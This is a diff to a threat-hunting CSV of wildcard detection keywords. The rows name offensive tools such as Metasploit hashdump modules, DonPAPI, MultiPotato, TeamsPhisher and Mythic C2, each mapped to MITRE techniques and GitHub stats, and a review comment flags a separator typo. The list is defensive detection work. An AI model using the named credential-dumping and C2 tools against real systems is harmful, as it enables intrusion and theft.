security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*multibit2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*multi_meter_inject.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*multi_vendor_cctv_dvr_pass*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. 
vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*multibit2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*MultiPotato.cpp*","offensive_tool_keyword","MultiPotato","get SYSTEM via SeImpersonate privileges","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S3cur3Th1sSh1t/MultiPotato","1","1","N/A","10","5","485","87","2021-11-20T16:20:23Z","2021-11-19T15:50:55Z" "*MultiPotato.exe*","offensive_tool_keyword","MultiPotato","get SYSTEM via SeImpersonate privileges","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S3cur3Th1sSh1t/MultiPotato","1","1","N/A","10","5","485","87","2021-11-20T16:20:23Z","2021-11-19T15:50:55Z" "*MultiPotato-main*","offensive_tool_keyword","MultiPotato","get SYSTEM via SeImpersonate privileges","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege 
Escalation","https://github.com/S3cur3Th1sSh1t/MultiPotato","1","1","N/A","10","5","485","87","2021-11-20T16:20:23Z","2021-11-19T15:50:55Z" 
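Review bot: The techniques field of the re-added metasploit rows (`*mssql_brute.rc*`, `*mssql_local_auth_bypass.*`, `*mssql_local_hashdump.rb*`, `*multi_meter_inject.rb*`, `*multi_vendor_cctv_dvr_pass*`) still reads `T1204 -T1210`, while the other entries in that column are separated by ` - `. If a consumer tokenises the column on ` - ` (not visible here, so an assumption), it gets the single token `T1204 -T1210` and these detections lose their T1204 and T1210 mapping. Since the commit already rewrites these rows to refresh the star, fork and updated_at columns, the field could be corrected to `T1204 - T1210` in the same pass. The `*msfvenom -*` metasploit row in the preceding hunk carries the same string.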
@@ -13833,121 +13993,121 @@ "*mwrlabs*","offensive_tool_keyword","Github Username","used to be a malware repo aso hosting exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/mwrlabs","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*-my.sharepoint.com/personal/Fakeuser*","offensive_tool_keyword","onedrive_user_enum","enumerate valid onedrive users","T1087 - T1110","TA0006","N/A","N/A","Network Exploitation tools","https://github.com/nyxgeek/onedrive_user_enum","1","1","N/A","N/A","5","490","73","2023-09-21T06:52:07Z","2019-03-05T08:54:38Z" "*-my.sharepoint.com/personal/TESTUSER_*","offensive_tool_keyword","onedrive_user_enum","enumerate valid onedrive users","T1087 - T1110","TA0006","N/A","N/A","Network Exploitation tools","https://github.com/nyxgeek/onedrive_user_enum","1","1","N/A","N/A","5","490","73","2023-09-21T06:52:07Z","2019-03-05T08:54:38Z" -"*my_dump_my_pe*","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. 
and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","1","N/A","10","10","1068","227","2023-09-08T10:09:19Z","2021-08-15T18:17:28Z" -"*myreallycooltotallyrealtenant.onmicrosoft.com*","offensive_tool_keyword","teamsphisher","Send phishing messages and attachments to Microsoft Teams users","T1566.001 - T1566.002 - T1204.001","TA0001 - TA0005","N/A","N/A","phishing","https://github.com/Octoberfest7/TeamsPhisher","1","1","N/A","N/A","9","831","109","2023-07-14T00:23:30Z","2023-07-03T02:19:47Z" -"*myseatbelt.py*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","8","731","94","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" +"*my_dump_my_pe*","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. 
and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","1","N/A","10","10","1070","227","2023-09-08T10:09:19Z","2021-08-15T18:17:28Z" +"*myreallycooltotallyrealtenant.onmicrosoft.com*","offensive_tool_keyword","teamsphisher","Send phishing messages and attachments to Microsoft Teams users","T1566.001 - T1566.002 - T1204.001","TA0001 - TA0005","N/A","N/A","phishing","https://github.com/Octoberfest7/TeamsPhisher","1","1","N/A","N/A","9","832","109","2023-07-14T00:23:30Z","2023-07-03T02:19:47Z" +"*myseatbelt.py*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","8","732","95","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" "*mysql -u* -p c2 < c2_sample.sql*","offensive_tool_keyword","golang_c2","C2 written in Go for red teams aka gorfice2k","T1071 - T1021 - T1043 - T1090","TA0011 - TA0008 - 
TA0010","N/A","N/A","C2","https://github.com/m00zh33/golang_c2","1","0","N/A","10","10","4","8","2019-03-18T00:46:41Z","2019-03-19T02:39:59Z" -"*mysql_authbypass_hashdump.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*mysql_file_enum.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*mysql_hashdump.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*mysql_authbypass_hashdump.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*mysql_file_enum.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*mysql_hashdump.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. 
and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*mysql-privesc-race.c*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" "*Mystikal-main*","offensive_tool_keyword","Mystikal","macOS Initial Access Payload Generator","T1059.005 - T1204.002 - T1566.001","TA0002 - TA0001","N/A","N/A","Exploitation tools","https://github.com/D00MFist/Mystikal","1","1","N/A","9","3","245","35","2023-05-10T15:21:26Z","2021-05-03T14:46:16Z" -"*mythic_c2_container*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2490","383","2023-10-03T23:06:16Z","2018-07-05T02:09:59Z" -"*mythic_nginx*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - 
T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2490","383","2023-10-03T23:06:16Z","2018-07-05T02:09:59Z" -"*mythic_payloadtype*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2490","383","2023-10-03T23:06:16Z","2018-07-05T02:09:59Z" -"*mythic_payloadtype*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2490","383","2023-10-03T23:06:16Z","2018-07-05T02:09:59Z" -"*mythic_payloadtype_container*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2490","383","2023-10-03T23:06:16Z","2018-07-05T02:09:59Z" -"*mythic_rest.Payload*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - 
TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2490","383","2023-10-03T23:06:16Z","2018-07-05T02:09:59Z" -"*mythic_service.py*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2490","383","2023-10-03T23:06:16Z","2018-07-05T02:09:59Z" -"*mythic_translator_containter*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2490","383","2023-10-03T23:06:16Z","2018-07-05T02:09:59Z" +"*mythic_c2_container*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z" +"*mythic_nginx*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z" +"*mythic_payloadtype*","offensive_tool_keyword","mythic","A collaborative 
multi-platform red teaming framework","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z" +"*mythic_payloadtype*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z" +"*mythic_payloadtype_container*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z" +"*mythic_rest.Payload*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z" +"*mythic_service.py*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - 
TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z" +"*mythic_translator_containter*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z" "*MythicAgents/Apollo*","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z" -"*MythicAgents/Athena*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-03T16:51:44Z","2022-01-24T20:44:38Z" -"*MythicAgents/merlin*","offensive_tool_keyword","mythic","Cross-platform post-exploitation HTTP Command & Control agent written in golang","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/merlin","1","1","N/A","10","10","57","10","2023-08-11T15:02:23Z","2021-01-25T12:36:46Z" +"*MythicAgents/Athena*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*MythicAgents/merlin*","offensive_tool_keyword","mythic","Cross-platform post-exploitation HTTP Command & Control agent written in golang","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/merlin","1","1","N/A","10","10","58","10","2023-08-11T15:02:23Z","2021-01-25T12:36:46Z" "*MythicAgents/tetanus*","offensive_tool_keyword","tetanus","Mythic C2 agent targeting Linux and Windows hosts written in Rust","T1550 T1555 T1212 T1558","N/A","N/A","N/A","POST Exploitation 
tools","https://github.com/MythicAgents/tetanus","1","1","N/A","N/A","3","229","33","2023-05-14T21:34:20Z","2022-03-07T20:35:33Z" -"*mythic-cli *","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","0","N/A","10","10","2490","383","2023-10-03T23:06:16Z","2018-07-05T02:09:59Z" -"*mythic-cli*athena*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","0","N/A","10","10","137","32","2023-10-03T16:51:44Z","2022-01-24T20:44:38Z" -"*MythicClient.cs*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-03T16:51:44Z","2022-01-24T20:44:38Z" -"*mythic-docker*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2490","383","2023-10-03T23:06:16Z","2018-07-05T02:09:59Z" +"*mythic-cli *","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","0","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z" +"*mythic-cli*athena*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","0","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*MythicClient.cs*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*mythic-docker*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z" "*MzHmO/DebugAmsi*","offensive_tool_keyword","DebugAmsi","DebugAmsi is another way to bypass AMSI through the Windows process debugger mechanism.","T1562.001 - T1050.005","TA0005 - TA0003","N/A","N/A","Defense 